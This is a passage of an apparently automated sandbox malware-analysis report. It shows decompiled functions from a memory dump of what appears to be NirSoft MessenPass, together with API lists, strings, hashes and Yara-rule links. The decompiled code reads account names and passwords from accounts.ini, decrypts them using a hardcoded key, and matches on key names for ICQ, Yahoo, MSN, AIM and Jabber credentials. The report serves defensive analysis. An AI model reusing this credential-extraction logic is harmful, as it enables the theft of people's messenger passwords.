                                • String ID: %s:$EDIT$STATIC
                                • API String ID: 1703216249-3046471546
                                • Opcode ID: aed0d2fc460153e712b5f87657be857b759c42e44ee73449b635be24a1b57749
                                • Instruction ID: b52727e0d403183305b875c614282f55299ec8bf2f46e0c3c56b37a88aeefe3f
                                • Opcode Fuzzy Hash: aed0d2fc460153e712b5f87657be857b759c42e44ee73449b635be24a1b57749
                                • Instruction Fuzzy Hash: B2B1DF72108341AFD711DF68C985AABBBE9FF88704F00492DFA9993261DB75E904CF16
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 004105A6, Relevance: 42.2, APIs: 22, Strings: 2, Instructions: 213windowCOMMON
                                Download Yara Rule
                                APIs
                                • EndDialog.USER32(?,?), ref: 004105EE
                                • GetDlgItem.USER32(?,000003EA), ref: 00410606
                                • SendMessageA.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00410625
                                • SendMessageA.USER32(?,00000301,00000000,00000000), ref: 00410632
                                • SendMessageA.USER32(?,000000B1,00000000,00000000), ref: 0041063B
                                • memset.MSVCRT ref: 00410663
                                • memset.MSVCRT ref: 00410683
                                • memset.MSVCRT ref: 004106A1
                                • memset.MSVCRT ref: 004106BA
                                • memset.MSVCRT ref: 004106D8
                                • memset.MSVCRT ref: 004106F1
                                • GetCurrentProcess.KERNEL32 ref: 004106F9
                                • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0041071E
                                • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 00410754
                                • memset.MSVCRT ref: 0041078F
                                • GetCurrentProcessId.KERNEL32 ref: 0041079D
                                • memcpy.MSVCRT ref: 004107CC
                                • _mbscpy.MSVCRT ref: 004107EE
                                • sprintf.MSVCRT ref: 00410859
                                • SetDlgItemTextA.USER32(?,000003EA,?), ref: 00410872
                                • GetDlgItem.USER32(?,000003EA), ref: 0041087C
                                • SetFocus.USER32(00000000), ref: 00410883
                                Strings
                                • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8XEIP=%8.8XStack Data: %sCode Data: %s, xrefs: 00410853
                                • {Unknown}, xrefs: 00410668
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_mbscpymemcpysprintf
                                • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8XEIP=%8.8XStack Data: %sCode Data: %s${Unknown}
                                • API String ID: 1428123949-3474136107
                                • Opcode ID: dfc1cacd1db7b3e5e31f88e82e27deeb72c9f49ab4d69ff4c670fff32b5d8099
                                • Instruction ID: 62e2ad0b84330276400548424eb425e056568d51af16bfff45d60a010caf4195
                                • Opcode Fuzzy Hash: dfc1cacd1db7b3e5e31f88e82e27deeb72c9f49ab4d69ff4c670fff32b5d8099
                                • Instruction Fuzzy Hash: 1D7108B2804248FFD721DF51EC45EDB7BACEF48344F04443EF54892160EA759A94CBA9
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040B4F6, Relevance: 35.3, APIs: 14, Strings: 6, Instructions: 286windowregistrystringCOMMON
                                Download Yara Rule
                                C-Code - Quality: 65%
                                			E0040B4F6(void* __ecx, void* __eflags) {
				void* __edi;
				void* __esi;
				struct HMENU__* _t115;
				struct HWND__* _t117;
				void* _t119;
				intOrPtr _t123;
				void* _t128;
				void* _t129;
				intOrPtr _t131;
				void* _t164;
				void* _t165;
				int _t170;
				void* _t171;
				void* _t172;
				void* _t176;
				void* _t185;
				void* _t195;
				void* _t196;
				intOrPtr _t198;
				intOrPtr _t199;
				void* _t200;
				intOrPtr* _t201;
				int _t203;
				intOrPtr* _t208;
				int* _t209;
				void* _t211;
				intOrPtr* _t212;
				void* _t214;

				_t214 = __eflags;
				_t209 = _t211 - 0x78;
				_t212 = _t211 - 0xa0;
				_t165 = __ecx;
				 *(_t209 - 0x28) =  *(_t209 - 0x28) & 0x00000000;
				 *(_t209 - 0x24) =  *(_t209 - 0x24) & 0x00000000;
				 *((char*)(_t209 - 0x20)) = 0;
				 *((char*)(_t209 - 0x1f)) = 1;
				 *((char*)(_t209 - 0x1e)) = 0;
				 *((char*)(_t209 - 0x1d)) = 0;
				asm("stosd");
				asm("stosd");
				 *((intOrPtr*)(_t209 - 0x14)) = 6;
				 *((intOrPtr*)(_t209 - 0x10)) = 0x9c56;
				 *((char*)(_t209 - 0xc)) = 4;
				 *((char*)(_t209 - 0xb)) = 0;
				 *((char*)(_t209 - 0xa)) = 0;
				 *((char*)(_t209 - 9)) = 0;
				asm("stosd");
				asm("stosd");
				 *_t209 = 1;
				_t209[1] = 0x9c41;
				_t209[2] = 4;
				_t209[2] = 0;
				_t209[2] = 0;
				_t209[2] = 0;
				asm("stosd");
				asm("stosd");
				_t209[5] = 5;
				_t209[6] = 0x9c44;
				_t209[7] = 4;
				_t209[7] = 0;
				_t209[7] = 0;
				_t209[7] = 0;
				_t209[0x1b] = _t209[0x1b] | 0xffffffff;
				asm("stosd");
				asm("stosd");
				_t209[0xa] = 2;
				_t209[0xb] = 0x9c48;
				_t209[0xc] = 4;
				_t209[0xc] = 0;
				_t209[0xc] = 0;
				_t209[0xc] = 0;
				asm("stosd");
				asm("stosd");
				_t209[0xf] = 3;
				_t209[0x10] = 0x9c49;
				_t209[0x11] = 4;
				_t209[0x11] = 0;
				_t209[0x11] = 0;
				_t209[0x11] = 0;
				asm("stosd");
				asm("stosd");
				_t209[0x14] = 4;
				_t209[0x15] = 0x9c42;
				_t209[0x16] = 4;
				_t209[0x16] = 0;
				_t209[0x16] = 0;
				_t209[0x16] = 0;
				asm("stosd");
				_t196 = 0x66;
				asm("stosd");
				_t115 = E00408A29(_t196);
				 *(__ecx + 0x11c) = _t115;
				SetMenu( *(__ecx + 0x108), _t115);
				_t117 =  *0x41502c(0x50000000, 0x417c88,  *(_t165 + 0x108), 0x101, _t185, _t195, _t164);
				 *(_t165 + 0x114) = _t117;
				SendMessageA(_t117, 0x404, 1,  &(_t209[0x1b]));
				_t119 = LoadImageA( *0x41dbd4, 0x68, 0, 0, 0, 0x9060);
				 *((intOrPtr*)(_t165 + 0x118)) =  *0x415044( *(_t165 + 0x108), 0x50010900, 0x102, 7, 0, _t119, _t209 - 0x28, 7, 0x10, 0x10, 0x70, 0x10, 0x14);
				E00403CB2( *((intOrPtr*)(_t165 + 0x390)), _t214, CreateWindowExA(0, "SysListView32", 0, 0x50810809, 0, 0, 0x190, 0xc8,  *(_t165 + 0x108), 0x103,  *0x41dbd4, 0), 1);
				_t123 =  *((intOrPtr*)(_t165 + 0x390));
				_t170 =  *(_t123 + 0x1b0);
				_t198 =  *((intOrPtr*)(_t123 + 0x1b4));
				_t209[0x1c] =  *(_t123 + 0x184);
				if(_t170 <= 0) {
					L3:
					_t199 =  *((intOrPtr*)(_t165 + 0x390));
					E0040AC28(_t199);
					 *0x415040( *((intOrPtr*)(_t199 + 0x18c)), 0);
					_t128 = E00407017(0x6d);
					_t171 = 0xffffff;
					_t129 =  *0x41503c( *((intOrPtr*)(_t199 + 0x18c)), _t128);
					if( *((intOrPtr*)(_t199 + 0x1b8)) != 0) {
						E0040AB96(_t129, _t171, 0, _t199);
					}
					_t200 = 0x68;
					 *((intOrPtr*)(_t165 + 0x170)) = E00408A29(_t200);
					_t131 =  *((intOrPtr*)(_t165 + 0x398));
					if( *((intOrPtr*)(_t131 + 0x30)) <= 0) {
						_t172 = 0x417c88;
					} else {
						if( *((intOrPtr*)(_t131 + 0x1c)) <= 0) {
							_t172 = 0;
						} else {
							_t172 =  *((intOrPtr*)( *((intOrPtr*)(_t131 + 0xc)))) +  *((intOrPtr*)(_t131 + 0x10));
						}
					}
					0x413dce(_t172, "/noloadsettings");
					_t221 = _t131;
					if(_t131 == 0) {
						RegDeleteKeyA(0x80000001, "Software\NirSoft\MessenPass");
					}
					_t201 = _t165 + 0x38c;
					E0040D725( *_t201, _t221);
					E0040BBF0(_t165, 0);
					 *( *_t201 + 0x724) = 1;
					SetFocus( *( *((intOrPtr*)(_t165 + 0x390)) + 0x184));
					if( *0x41e678 == 0) {
						E004069FA(0x41e678);
						if((GetFileAttributesA(0x41e678) & 0x00000001) != 0) {
							GetTempPathA(0x104, 0x41e678);
						}
					}
					_t203 = strlen(0x41e678);
					 *_t212 = 0x4185dc;
					_t94 = strlen(??) + 1; // 0x1
					_t224 = _t203 + _t94 - 0x104;
					if(_t203 + _t94 >= 0x104) {
						 *((char*)(_t165 + 0x180)) = 0;
					} else {
						E00406B4B(_t165 + 0x180, 0x41e678, "report.html");
					}
					_push(1);
					_t176 = 0x30;
					E0040AD6F( *((intOrPtr*)(_t165 + 0x390)), _t176);
					E0040B4DB(_t165);
					 *((intOrPtr*)(_t165 + 0x394)) = RegisterClipboardFormatA("commdlg_FindReplace");
					E0040AFE6(_t176, _t165, _t224, 0);
					if(E004077AF( *((intOrPtr*)(_t165 + 0x398)), ?str?, 3) >= 0) {
						 *((intOrPtr*)( *((intOrPtr*)(_t165 + 0x390)) + 0x1c8)) = E00406D5A(E0040779F(_t148,  *((intOrPtr*)(_t165 + 0x398))) + 3);
					}
					_t209[0x19] = 0x12c;
					_t209[0x1a] = 0x400;
					SendMessageA( *(_t165 + 0x114), 0x404, 2,  &(_t209[0x19]));
					return SendMessageA( *(_t165 + 0x114), 0x401, 0x1001, 0);
				} else {
					_t208 = _t198 + 0xc;
					_t209[0x1d] = _t170;
					do {
						E00404E68( *((intOrPtr*)(_t208 + 4)),  *((intOrPtr*)(_t208 - 8)), _t209[0x1c],  *((intOrPtr*)(_t208 - 0xc)),  *((intOrPtr*)(_t208 - 4)),  *_t208);
						_t212 = _t212 + 0x10;
						_t208 = _t208 + 0x14;
						_t75 =  &(_t209[0x1d]);
						 *_t75 = _t209[0x1d] - 1;
					} while ( *_t75 != 0);
					goto L3;
				}
			}































                                0x0040b4f6
                                0x0040b4f7
                                0x0040b4fb
                                0x0040b504
                                0x0040b506
                                0x0040b50a
                                0x0040b50e
                                0x0040b512
                                0x0040b516
                                0x0040b51a
                                0x0040b523
                                0x0040b524
                                0x0040b525
                                0x0040b52c
                                0x0040b533
                                0x0040b537
                                0x0040b53b
                                0x0040b53f
                                0x0040b548
                                0x0040b549
                                0x0040b54a
                                0x0040b551
                                0x0040b558
                                0x0040b55c
                                0x0040b560
                                0x0040b564
                                0x0040b56d
                                0x0040b56e
                                0x0040b56f
                                0x0040b576
                                0x0040b57d
                                0x0040b581
                                0x0040b585
                                0x0040b589
                                0x0040b58f
                                0x0040b596
                                0x0040b597
                                0x0040b598
                                0x0040b59f
                                0x0040b5a6
                                0x0040b5aa
                                0x0040b5ae
                                0x0040b5b2
                                0x0040b5bb
                                0x0040b5bc
                                0x0040b5bd
                                0x0040b5c4
                                0x0040b5cb
                                0x0040b5cf
                                0x0040b5d3
                                0x0040b5d7
                                0x0040b5e0
                                0x0040b5e1
                                0x0040b5e2
                                0x0040b5e9
                                0x0040b5f0
                                0x0040b5f4
                                0x0040b5f8
                                0x0040b5fc
                                0x0040b605
                                0x0040b608
                                0x0040b609
                                0x0040b60a
                                0x0040b616
                                0x0040b61c
                                0x0040b637
                                0x0040b649
                                0x0040b64f
                                0x0040b667
                                0x0040b69e
                                0x0040b6d6
                                0x0040b6db
                                0x0040b6e1
                                0x0040b6e9
                                0x0040b6f5
                                0x0040b6f8
                                0x0040b721
                                0x0040b721
                                0x0040b729
                                0x0040b735
                                0x0040b742
                                0x0040b747
                                0x0040b74f
                                0x0040b75b
                                0x0040b75d
                                0x0040b75d
                                0x0040b764
                                0x0040b76a
                                0x0040b770
                                0x0040b779
                                0x0040b78e
                                0x0040b77b
                                0x0040b77e
                                0x0040b78a
                                0x0040b780
                                0x0040b785
                                0x0040b785
                                0x0040b77e
                                0x0040b799
                                0x0040b79e
                                0x0040b7a2
                                0x0040b7ae
                                0x0040b7ae
                                0x0040b7b4
                                0x0040b7bc
                                0x0040b7c4
                                0x0040b7cb
                                0x0040b7e1
                                0x0040b7f3
                                0x0040b7f5
                                0x0040b803
                                0x0040b80b
                                0x0040b80b
                                0x0040b803
                                0x0040b817
                                0x0040b819
                                0x0040b825
                                0x0040b829
                                0x0040b82f
                                0x0040b84a
                                0x0040b831
                                0x0040b841
                                0x0040b847
                                0x0040b857
                                0x0040b85b
                                0x0040b85c
                                0x0040b863
                                0x0040b876
                                0x0040b87c
                                0x0040b895
                                0x0040b8b2
                                0x0040b8b2
                                0x0040b8cf
                                0x0040b8d6
                                0x0040b8dd
                                0x0040b8f9
                                0x0040b6fa
                                0x0040b6fa
                                0x0040b6fd
                                0x0040b700
                                0x0040b711
                                0x0040b716
                                0x0040b719
                                0x0040b71c
                                0x0040b71c
                                0x0040b71c
                                0x00000000
                                0x0040b700

                                APIs
                                  • Part of subcall function 00408A29: LoadMenuA.USER32(00000000), ref: 00408A31
                                  • Part of subcall function 00408A29: sprintf.MSVCRT ref: 00408A54
                                • SetMenu.USER32(?,00000000), ref: 0040B61C
                                • SendMessageA.USER32(00000000,00000404,00000001,?), ref: 0040B64F
                                • LoadImageA.USER32(00000068,00000000,00000000,00000000,00009060), ref: 0040B667
                                • CreateWindowExA.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000), ref: 0040B6C7
                                • _strcmpi.MSVCRT ref: 0040B799
                                • RegDeleteKeyA.ADVAPI32(80000001,Software\NirSoft\MessenPass), ref: 0040B7AE
                                • SetFocus.USER32(?), ref: 0040B7E1
                                • GetFileAttributesA.KERNEL32(0041E678), ref: 0040B7FB
                                • GetTempPathA.KERNEL32(00000104,0041E678), ref: 0040B80B
                                • strlen.MSVCRT ref: 0040B812
                                • strlen.MSVCRT ref: 0040B820
                                • RegisterClipboardFormatA.USER32(commdlg_FindReplace), ref: 0040B86D
                                  • Part of subcall function 00404E68: strlen.MSVCRT ref: 00404E85
                                  • Part of subcall function 00404E68: SendMessageA.USER32(00000000,0000101B,00000000,?), ref: 00404EA9
                                • SendMessageA.USER32(?,00000404,00000002,?), ref: 0040B8DD
                                • SendMessageA.USER32(?,00000401,00001001,00000000), ref: 0040B8F0
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: MessageSend$strlen$LoadMenu$AttributesClipboardCreateDeleteFileFocusFormatImagePathRegisterTempWindow_strcmpisprintf
                                • String ID: /noloadsettings$/sm$Software\NirSoft\MessenPass$SysListView32$commdlg_FindReplace$report.html
                                • API String ID: 2862451953-3267067943
                                • Opcode ID: ea6126f0ad9a3bdd701ee80c8346164e4811f452d9b02224669d18572419d2bb
                                • Instruction ID: 58ee6bec69cc5a2ead352e1dc17fbc33d0493dc4f48ef93b1c15430ab04c662e
                                • Opcode Fuzzy Hash: ea6126f0ad9a3bdd701ee80c8346164e4811f452d9b02224669d18572419d2bb
                                • Instruction Fuzzy Hash: 4FC1F271500244EFEB129F64C84ABDA7FA5EF54708F04407EFA446F2D2CBB95944CBA9
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040F689, Relevance: 35.2, APIs: 12, Strings: 8, Instructions: 192COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 0040F94E: SetFilePointer.KERNEL32(0040F292,?,00000000,00000000,00418AF8,00000000,?,?,0040F8C4,?,00000000,?,74B5F560), ref: 0040F968
                                  • Part of subcall function 0040F94E: memset.MSVCRT ref: 0040F973
                                • _strcmpi.MSVCRT ref: 0040F729
                                • _strcmpi.MSVCRT ref: 0040F740
                                • _strcmpi.MSVCRT ref: 0040F757
                                • _strcmpi.MSVCRT ref: 0040F76E
                                • _strcmpi.MSVCRT ref: 0040F792
                                • _strcmpi.MSVCRT ref: 0040F7A6
                                • _strcmpi.MSVCRT ref: 0040F7BA
                                • _strcmpi.MSVCRT ref: 0040F7CE
                                • _strcmpi.MSVCRT ref: 0040F7E2
                                • _mbscpy.MSVCRT ref: 0040F831
                                • _strcmpi.MSVCRT ref: 0040F843
                                • _mbscpy.MSVCRT ref: 0040F88E
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: _strcmpi$_mbscpy$FilePointermemset
                                • String ID: LoginName$UIN$e-mail$gg_1$icq$icq_1$password$yahoo_id
                                • API String ID: 3770779768-1670397801
                                • Opcode ID: 35a2a10a4a641d2086cb2dbdba6566c00143c3982c3012e31156ad73f44fce61
                                • Instruction ID: 0cc2e13a8e56b2c188e74045540a3fe2ab2ea4ed6cca8b10f1d7ecee0d286665
                                • Opcode Fuzzy Hash: 35a2a10a4a641d2086cb2dbdba6566c00143c3982c3012e31156ad73f44fce61
                                • Instruction Fuzzy Hash: 795177725043096EEB21DAA2DC81EEA73AC9F04715F60447FF505E25C1EB38EB89879D
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040244D, Relevance: 33.4, APIs: 7, Strings: 12, Instructions: 132COMMON
                                Download Yara Rule
                                C-Code - Quality: 48%
                                			E0040244D(short* _a4, short* _a8) {
				char _v5;
				char _v6;
				char _v7;
				char _v8;
				char _v9;
				char _v10;
				char _v11;
				char _v12;
				char _v13;
				char _v14;
				char _v15;
				char _v16;
				char _v17;
				char _v18;
				char _v19;
				char _v20;
				char _v21;
				char _v22;
				char _v23;
				char _v24;
				char _v25;
				char _v26;
				char _v27;
				char _v28;
				char _v29;
				char _v30;
				char _v31;
				char _v32;
				char _v33;
				char _v34;
				char _v35;
				char _v36;
				char _v37;
				char _v38;
				char _v39;
				char _v40;
				char _v41;
				char _v42;
				char _v43;
				char _v44;
				char _v45;
				char _v46;
				char _v47;
				char _v48;
				char _v49;
				char _v50;
				char _v51;
				char _v52;
				char _v53;
				char _v54;
				char _v55;
				char _v56;
				char _v57;
				char _v58;
				char _v59;
				void _v60;
				intOrPtr _v64;
				char _v68;
				void _v1091;
				char _v1092;
				char _v2108;
				void _v2116;
				void* __edi;
				char _t82;
				void* _t89;
				short* _t90;
				void* _t92;
				intOrPtr _t102;
				short* _t103;
				void* _t104;
				intOrPtr* _t105;

				_v1092 = 0;
				memset( &_v1091, 0, 0x3ff);
				_t105 = _t104 + 0xc;
				WideCharToMultiByte(0, 0, _a8, 0xffffffff,  &_v1092, 0x400, 0, 0);
				_t82 = E004029D9( &_v1092,  &_v2116, 0x400);
				_t102 = _t82;
				_pop(_t92);
				if(_t102 > 8) {
					0x413d5c(0x48);
					_v68 = _t82;
					 *_t105 = 0x1000;
					0x413d5c();
					_v64 = _t82;
					_v60 = 0;
					_v59 = 0;
					_v58 = 0;
					_v57 = 0;
					_v56 = 0;
					_v55 = 0;
					_v54 = 0;
					_v53 = 0;
					_v52 = 0x99;
					_v51 = 0;
					_v50 = 0x86;
					_v49 = 0xa5;
					_v48 = 0x27;
					_v47 = 0xaa;
					_v46 = 0x9d;
					_v45 = 0x7f;
					_v44 = 0x58;
					_v43 = 0xaa;
					_v42 = 0xae;
					_v41 = 0xb9;
					_v40 = 0xb;
					_v39 = 0x47;
					_v38 = 0x3a;
					_v37 = 0x35;
					_v36 = 0xaa;
					_v35 = 0xe0;
					_v34 = 0xea;
					_v33 = 0x95;
					_v32 = 0x66;
					_v31 = 0xfb;
					_v30 = 0xe4;
					_v29 = 0x9f;
					_v28 = 0xcb;
					_v27 = 0xf7;
					_v26 = 0x16;
					_v25 = 0x1c;
					_v24 = 0xa3;
					_v23 = 0x92;
					_v22 = 0xe6;
					_v21 = 0x1c;
					_v20 = 0x96;
					_v19 = 6;
					_v18 = 0x9b;
					_v17 = 0x5b;
					_v16 = 0x29;
					_v15 = 0x30;
					_v14 = 0xbf;
					_v13 = 0xaf;
					_v12 = 0xec;
					_v11 = 0x11;
					_v10 = 0x29;
					_v9 = 0xc8;
					_v8 = 0x89;
					_v7 = 0x5b;
					_v6 = 0xb8;
					_v5 = 0x57;
					memcpy( &_v60,  &_v2116, 8);
					E00403632(_t92,  &_v68,  &_v60);
					_t70 = _t102 - 8; // -8
					_t88 = _t70;
					if(_t70 > 0x1fe) {
						_t88 = 0x1fe;
					}
					_t103 = _a4;
					_t89 = E0040373E(_t88, _t103,  &_v2108,  &_v68);
					 *((short*)(_t103 + 0x1fe)) = 0;
					0x413d56(_v68);
					0x413d56(_v64);
					return _t89;
				}
				_t90 = _a4;
				 *_t90 = 0;
				return _t90;
			}










































































                                0x00402468
                                0x0040246e
                                0x00402473
                                0x0040248c
                                0x0040249f
                                0x004024a4
                                0x004024a9
                                0x004024aa
                                0x004024b9
                                0x004024be
                                0x004024c1
                                0x004024c8
                                0x004024cd
                                0x004024dd
                                0x004024e0
                                0x004024e3
                                0x004024e6
                                0x004024e9
                                0x004024ec
                                0x004024ef
                                0x004024f2
                                0x004024f5
                                0x004024f9
                                0x004024fc
                                0x00402500
                                0x00402504
                                0x00402508
                                0x0040250c
                                0x00402510
                                0x00402514
                                0x00402518
                                0x0040251c
                                0x00402520
                                0x00402524
                                0x00402528
                                0x0040252c
                                0x00402530
                                0x00402534
                                0x00402538
                                0x0040253c
                                0x00402540
                                0x00402544
                                0x00402548
                                0x0040254c
                                0x00402550
                                0x00402554
                                0x00402558
                                0x0040255c
                                0x00402560
                                0x00402564
                                0x00402568
                                0x0040256c
                                0x00402570
                                0x00402574
                                0x00402578
                                0x0040257c
                                0x00402580
                                0x00402584
                                0x00402588
                                0x0040258c
                                0x00402590
                                0x00402594
                                0x00402598
                                0x0040259c
                                0x004025a0
                                0x004025a4
                                0x004025a8
                                0x004025ac
                                0x004025b0
                                0x004025b4
                                0x004025c3
                                0x004025c8
                                0x004025c8
                                0x004025d2
                                0x004025d4
                                0x004025d4
                                0x004025d6
                                0x004025e5
                                0x004025ed
                                0x004025f4
                                0x004025fc
                                0x00000000
                                0x00402602
                                0x004024ac
                                0x004024af
                                0x00000000

                                APIs
                                • memset.MSVCRT ref: 0040246E
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000400,00000000,00000000), ref: 0040248C
                                  • Part of subcall function 004029D9: strlen.MSVCRT ref: 004029E6
                                • ??2@YAPAXI@Z.MSVCRT ref: 004024B9
                                • ??2@YAPAXI@Z.MSVCRT ref: 004024C8
                                • memcpy.MSVCRT ref: 004025B4
                                • ??3@YAXPAX@Z.MSVCRT ref: 004025F4
                                • ??3@YAXPAX@Z.MSVCRT ref: 004025FC
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: ??2@??3@$ByteCharMultiWidememcpymemsetstrlen
                                • String ID: '$)$)$0$5$:$G$W$X$[$[$f
                                • API String ID: 3606715663-4187034442
                                • Opcode ID: 78e2de6518f2aa96f91a21bf45264a70b6d05d7b6be762a733f529882e30edb8
                                • Instruction ID: d66295c9476db63dbc5c32b0f61e30ac1af87f583ef6fa4ed04bb8f7da70bc00
                                • Opcode Fuzzy Hash: 78e2de6518f2aa96f91a21bf45264a70b6d05d7b6be762a733f529882e30edb8
                                • Instruction Fuzzy Hash: 98514C218087CEDDDB22D7BC98486DEBF745F26224F0843D9E1E47B2D2D265064AC77A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040E0A1, Relevance: 31.6, APIs: 12, Strings: 6, Instructions: 142stringCOMMON
                                Download Yara Rule
                                C-Code - Quality: 84%
                                			E0040E0A1(intOrPtr* _a4, char* _a8) {
				char* _v8;
				void _v275;
				char _v276;
				void _v531;
				char _v532;
				intOrPtr _v536;
				intOrPtr _v540;
				int _v796;
				int _v1052;
				void _v2075;
				char _v2076;
				void _v3099;
				int _v3100;
				void _v4123;
				int _v4124;
				void _v5147;
				char _v5148;
				void* __ebx;
				void* __edi;
				int _t50;
				char* _t54;
				int _t89;
				int* _t105;
				void* _t110;
				void* _t111;

				0x414060();
				_t89 = 0;
				_v276 = 0;
				memset( &_v275, 0, 0x104);
				_t50 = strlen(_a8);
				_t5 = strlen("accounts.ini") + 1; // 0x1
				_t111 = _t110 + 0x14;
				if(_t50 + _t5 >= 0x104) {
					_v276 = 0;
				} else {
					E00406B4B( &_v276, _a8, "accounts.ini");
				}
				_t54 = GetPrivateProfileIntA("Accounts", "num", _t89,  &_v276);
				_v8 = _t54;
				_a8 = _t89;
				if(_t54 > _t89) {
					do {
						_v532 = _t89;
						memset( &_v531, _t89, 0xfe);
						_v5148 = _t89;
						memset( &_v5147, _t89, 0x3ff);
						_v2076 = _t89;
						memset( &_v2075, _t89, 0x3ff);
						_v3100 = _t89;
						memset( &_v3099, _t89, 0x3ff);
						_v4124 = _t89;
						memset( &_v4123, _t89, 0x3ff);
						_push(_a8);
						sprintf( &_v532, "Account%3.3d");
						_t111 = _t111 + 0x48;
						GetPrivateProfileStringA( &_v532, "Account", 0x417c88,  &_v5148, 0x3ff,  &_v276);
						GetPrivateProfileStringA( &_v532, "Password", 0x417c88,  &_v2076, 0x3ff,  &_v276);
						if(_v2076 != _t89) {
							E004029D9( &_v2076,  &_v3100, 0x3ff);
							E0040DCF2( &_v4124,  &_v3100);
							_v1052 = _t89;
							_v796 = _t89;
							_v536 = 0xf;
							_v540 = 0x15;
							E00406958(0xff,  &_v796,  &_v4124);
							_t105 =  &_v1052;
							E00406958(0xff, _t105,  &_v5148);
							 *((intOrPtr*)( *_a4))(_t105);
							_t89 = 0;
						}
						_a8 =  &(_a8[1]);
						_t54 = _a8;
					} while (_t54 < _v8);
				}
				return _t54;
			}




























                                0x0040e0a9
                                0x0040e0b6
                                0x0040e0c1
                                0x0040e0c7
                                0x0040e0cf
                                0x0040e0e0
                                0x0040e0e4
                                0x0040e0e9
                                0x0040e102
                                0x0040e0eb
                                0x0040e0f9
                                0x0040e0ff
                                0x0040e11a
                                0x0040e122
                                0x0040e125
                                0x0040e128
                                0x0040e133
                                0x0040e140
                                0x0040e146
                                0x0040e154
                                0x0040e15a
                                0x0040e168
                                0x0040e16e
                                0x0040e17c
                                0x0040e182
                                0x0040e190
                                0x0040e196
                                0x0040e19b
                                0x0040e1aa
                                0x0040e1b5
                                0x0040e1d8
                                0x0040e1fa
                                0x0040e202
                                0x0040e211
                                0x0040e221
                                0x0040e22c
                                0x0040e232
                                0x0040e244
                                0x0040e24e
                                0x0040e258
                                0x0040e264
                                0x0040e26a
                                0x0040e279
                                0x0040e27b
                                0x0040e27b
                                0x0040e27d
                                0x0040e280
                                0x0040e283
                                0x0040e133
                                0x0040e290

                                APIs
                                • memset.MSVCRT ref: 0040E0C7
                                • strlen.MSVCRT ref: 0040E0CF
                                • strlen.MSVCRT ref: 0040E0DB
                                • GetPrivateProfileIntA.KERNEL32(Accounts,num,00000000,?), ref: 0040E11A
                                • memset.MSVCRT ref: 0040E146
                                • memset.MSVCRT ref: 0040E15A
                                • memset.MSVCRT ref: 0040E16E
                                • memset.MSVCRT ref: 0040E182
                                • memset.MSVCRT ref: 0040E196
                                • sprintf.MSVCRT ref: 0040E1AA
                                • GetPrivateProfileStringA.KERNEL32(?,Account,00417C88,?,000003FF,?), ref: 0040E1D8
                                • GetPrivateProfileStringA.KERNEL32(?,Password,00417C88,?,000003FF,?), ref: 0040E1FA
                                  • Part of subcall function 00406B4B: _mbscpy.MSVCRT ref: 00406B53
                                  • Part of subcall function 00406B4B: _mbscat.MSVCRT ref: 00406B62
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: memset$PrivateProfile$Stringstrlen$_mbscat_mbscpysprintf
                                • String ID: Account$Account%3.3d$Accounts$Password$accounts.ini$num
                                • API String ID: 1850607429-3672167483
                                • Opcode ID: 574f83c5b41ac8dd83ff1764a4dea53749887e014cb38c5e2b2be6ead15973e1
                                • Instruction ID: 3695b6fee04a76e8e88970007e36b309292cfce1d28ac10fc6c7acbfdb1ec453
                                • Opcode Fuzzy Hash: 574f83c5b41ac8dd83ff1764a4dea53749887e014cb38c5e2b2be6ead15973e1
                                • Instruction Fuzzy Hash: A25193B184026CBECB10DB54DC86EDA77BCAF55304F1044FAB508E3141DA789FC98BA4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040EE6A, Relevance: 31.6, APIs: 11, Strings: 10, Instructions: 127COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: _strcmpi
                                • String ID: aim$aim_1$gg_1$icq$icq_1$jabber$jabber_1$msn$msn_1$yahoo
                                • API String ID: 1439213657-55676784
                                • Opcode ID: e5345bd8614f8dcd2d1c308e40a1d6c5d5934fe6eb63f7ee50686fc0058a6628
